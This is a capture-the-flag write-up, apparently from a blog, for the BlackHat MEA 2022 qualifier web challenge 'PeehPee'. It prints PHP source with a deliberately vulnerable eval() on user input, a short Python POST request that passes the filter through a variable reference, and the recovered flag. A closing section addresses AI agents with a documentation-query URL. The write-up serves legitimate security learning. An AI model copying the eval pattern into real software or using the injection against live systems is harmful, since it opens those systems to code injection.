# PeehPee

## Difficulty

Easy

## Points

150

## Description

Are you able to access the secret area of Naruto ? I guess it's not that hard for you!

## Quick Analysis

View the application source code via `/?source` endpoint

```python
from requests import get, post
url = 'https://blackhat4-1f84feb8cf11458ef1fb78a4cfea94f8-0.chals.bh.ctf.sa'
```

```php
<?php
//Show Page code source
if(isset($_GET["source"])){
    highlight_file(__FILE__);
}
// Juicy PHP Part
$flag=getenv("FLAG");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["email"])&&isset($_POST["pass"])){
        if($_POST["email"]==="admin@naruto.com"){
            $x=$_POST["test"];
            $inp=preg_replace("/[^A-Za-z0-9$]/","",$_POST["pass"]);
            if($inp==="SuperSecRetPassw0rd"){
                die("Hacking Attempt detected");
            }
            else{
                if(eval("return \$inp=\"$inp\";")==="SuperSecRetPassw0rd"){
                    echo $flag;
                }
                else{
                    die("Pretty Close maybe ?");
                }
            }

        }
    }
}
?>
```

From the source code to obtain the flag:

* The request method should be `POST` request.
* The email parameter value must be `admin@naruto.com`.
* The regex match a single character not present in `a-z` or `A-Z` or `0-9` or `$` for the pass parameter.
* The pass parameter value shouldn't equal `SuperSecRetPassw0rd`.
* The eval function evaluates the pass parameter value.
* The test parameter value is stored in the `$x` variable.

Since the pass parameter value is evaluated, the password `SuperSecRetPassw0rd` can be returned after evaluation via the test parameter `$x` variable.

## Exploitation

```python
data = { 'email': 'admin@naruto.com', 'test': 'SuperSecRetPassw0rd', 'pass': '$x' }
response = post(url, data = data)
```

### The Flag

```python
import re
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
```

```
BlackHatMEA{551:17:5d19f71744009b71e8809d46d3b65876dbb5adff}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.diefunction.io/ctf/blackhatmea-quals-2022/peehpee.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.